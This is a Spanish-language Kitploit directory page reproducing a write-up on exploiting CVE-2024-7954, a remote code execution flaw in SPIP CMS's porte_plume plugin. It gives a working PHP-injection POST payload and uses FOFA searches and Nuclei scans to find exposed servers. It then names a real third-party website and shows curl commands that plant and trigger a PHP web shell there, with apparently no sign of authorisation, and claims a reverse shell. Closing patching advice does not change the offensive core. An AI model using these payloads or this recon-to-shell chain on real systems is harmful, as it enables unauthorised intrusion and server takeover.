Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — Explotación de una Ejecución Remota de Código vulnerabilidad- (CVE-2024-7954) | Kitploit
Herramientas/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
ReconocimientoEscáneres de Vulnerabilidades WebAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y EducaciónRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Desarrollo de Payloads
Labs y Práctica
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

Explotación de una Ejecución Remota de Código vulnerabilidad- (CVE-2024-7954)

Ver Repositorio
13hace 9 mesesAún no revisado
Compartir

Explotación de Vulnerabilidad de Ejecución Remota de Código (CVE-2024-7954)

Proyecto de Pruebas de Vulnerabilidad de Software Presentado por: Shivansh Kuntal


Resumen

Este proyecto demuestra la explotación de CVE-2024-7954, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta a SPIP CMS a través de su plugin porte_plume. La vulnerabilidad permite a atacantes no autenticados ejecutar código PHP arbitrario en el servidor objetivo mediante solicitudes HTTP POST manipuladas.

Las pruebas se realizaron en un entorno local controlado y luego se extendieron a reconocimiento en el mundo real usando FOFA y Nuclei.


1. Configuración del Entorno

Se desplegó localmente una versión vulnerable de SPIP CMS, confirmada como afectada por CVE-2024-7954, en un servidor Apache utilizando un repositorio de GitHub que aloja versiones conocidas como vulnerables.

Herramientas Utilizadas

  • Burp Suite (interceptación y modificación de solicitudes HTTP)
  • Servidor Web Apache
  • Motor de Búsqueda FOFA
  • Escáner de Vulnerabilidades Nuclei
  • curl (explotación por línea de comandos)

La página de inicio de SPIP ejecutándose en localhost validó la instalación exitosa y sirvió como objetivo para la explotación.


2. Descripción de la Vulnerabilidad

El plugin porte_plume (anterior a las versiones 4.30-alpha2, 4.2.13, 4.1.16) es vulnerable debido a una sanitización insuficiente de la entrada proporcionada por el usuario. Los atacantes pueden inyectar código PHP en campos de formulario específicos que luego son renderizados y ejecutados por el servidor.

Impacto: Ejecución Remota de Código no Autenticada Gravedad: Crítica Vector de Ataque: Red / HTTP POST


3. Prueba de Concepto (PoC)

Solicitud POST Maliciosa

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Notas

  • El código PHP se inyecta dentro del motor de formato markdown.
  • Se ejecuta como el usuario de SPIP en el servidor.
  • El ataque no requiere autenticación.

4. Reconocimiento con FOFA

Se utilizó una consulta de FOFA para enumerar instalaciones públicas de SPIP:

root@kitploit:~
app="SPIP"

FOFA devolvió múltiples puntos de metadatos:

  • Cabeceras HTTP
  • Títulos
  • Direcciones IP y geolocalización
  • Pila tecnológica del servidor

Valor del Reconocimiento

  1. Enumeración de Objetivos: Identificar servidores SPIP CMS alcanzables.
  2. Huella de Versión: Determinar si versiones vulnerables del plugin están activas.
  3. Priorización: Seleccionar sistemas probablemente explotables.
  4. Verificación de Exploit: Validar endpoints usando payloads controlados.
  5. Automatización: Exportar resultados de FOFA a targets.txt para escaneo por lotes.

Un host real adecuado identificado:

root@kitploit:~
http://www.comite-tricolore.org/

5. Escaneo Automatizado con Nuclei

Propósito

Dado que la explotación manual es lenta, se utilizó Nuclei para automatizar la detección de CVE-2024-7954 en un gran conjunto de objetivos.

Comando (Plantilla Personalizada)

root@kitploit:~
nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt carga los resultados de FOFA
  • -t carga la plantilla PoC personalizada

Nota: La plantilla inicial no devolvió ninguna coincidencia.

Escaneo Amplio de CVE

root@kitploit:~
nuclei -l targets.txt -t cves/

Este escaneo identificó un objetivo receptivo:

root@kitploit:~
http://www.comite-tricolore.org/

6. Validación y Explotación Manual

Paso 1 — Inspeccionar el Endpoint Vulnerable

Visitar:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact

Confirmado:

  • Campos de entrada para nombre, correo electrónico, mensaje
  • Manejador de solicitud POST adecuado para inyección de payload

Paso 2 — Inyectar Payload PHP

Usando Burp Suite o curl, modificar el parámetro message:

Payload

root@kitploit:~
<?php system($_GET['cmd']); ?>

Paso 3 — Desencadenar la Ejecución de Comandos

Visitar:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

O usando curl:

root@kitploit:~
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

La salida confirmó la ejecución remota de comandos.

Paso 4 — Reverse Shell (Acceso Final)

Un payload manipulado permite una llamada de reverse shell, permitiendo:

  • whoami
  • ls
  • acceso completo a shell interactiva

7. Observaciones Críticas

  • Exploit no autenticado aumenta la gravedad drásticamente.
  • Fallo en la sanitización de entrada en el plugin es el problema central.
  • Una vez que el PHP se inyecta y renderiza, es posible comprometer completamente el servidor.
  • Reverse shell → posible escalada de privilegios → toma del servidor.
  • El ataque es trivial de automatizar con curl, scripts de Python o Nuclei.

8. Conclusión

Este proyecto demuestra la cadena completa de explotación para CVE-2024-7954, desde el reconocimiento hasta la obtención de una shell interactiva.

Ruta de Explotación

  1. Reconocimiento (FOFA)
  2. Escaneo Automatizado (Nuclei)
  3. Inyección Manual de Payload
  4. Ejecución de Código Verificada
  5. Acceso Reverse Shell

Lecciones de Seguridad

  • La validación estricta de entrada es obligatoria para todos los datos controlados por el usuario.
  • Los plugins deben seguir prácticas de codificación segura.
  • Las organizaciones deben aplicar parches de seguridad de manera oportuna.
  • Las evaluaciones regulares de vulnerabilidades son esenciales para prevenir ataques RCE.

Esta vulnerabilidad resalta cómo un plugin de formato de texto aparentemente inofensivo puede crear un compromiso completo del sistema cuando no está asegurado adecuadamente.

Descargar herramienta